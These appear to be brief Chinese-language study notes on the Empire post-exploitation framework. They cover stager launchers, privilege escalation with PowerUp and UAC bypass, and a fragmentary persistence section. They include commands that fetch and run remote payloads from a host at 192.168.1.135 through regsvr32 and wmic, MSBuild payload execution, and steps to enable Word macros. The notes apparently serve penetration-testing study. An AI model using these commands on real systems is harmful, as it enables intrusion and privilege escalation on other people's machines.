empire提权和持久化

stager的几种用法

windows/launcher_sct

1
2
3
regsvr32 /u /s /n /i:http://192.168.1.135/launcher.sct scrobj.dll

scrobj.dll: 固定的

windows/launcher_vbs

1
执行: Cscript launcher.vbs

windows/launcher_xml

1
2
3
执行:
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319
.\MSBuild.exe C:\users\一瓢饮\Desktop\la.xml

windows/wmic

wmic调用: wmic process call create calc –> command

1
执行: wmic os get /format:"http://192.168.1.135/la.xsl"

windows/macro

1
2
1. word 选项 --> 信任中心 --> 宏设置 --> 启用所有宏
2. 开发工具 --> 宏 --> 创建(所有活动模板和文档) --> templateProject --> microsoft word 对象 --> thisdocment --> 插入宏代码(VBA)

提权

github | 码云(gitee)

利用uac

绕过uac

本地提权: 漏洞查找 –> powershell/privesc/sherlock | widnows-suggester-exploit.py

powerup

1
2
3
4
5
6
7
8
usemodule privesc/powerup/allchecks 检测是否可以利用powerup漏洞

# 要检测的事情
[*] Checking if user is in a local group with administrative privileges... 
# 探测结果
[+] User is in a local group that grants administrative privileges!
# 利用方式
[+] Run a BypassUAC attack to elevate privileges to admin.

持久化

debugger代码修改:

136-139 用 ‘’’ ‘’’包裹注释

180按一下tab键对齐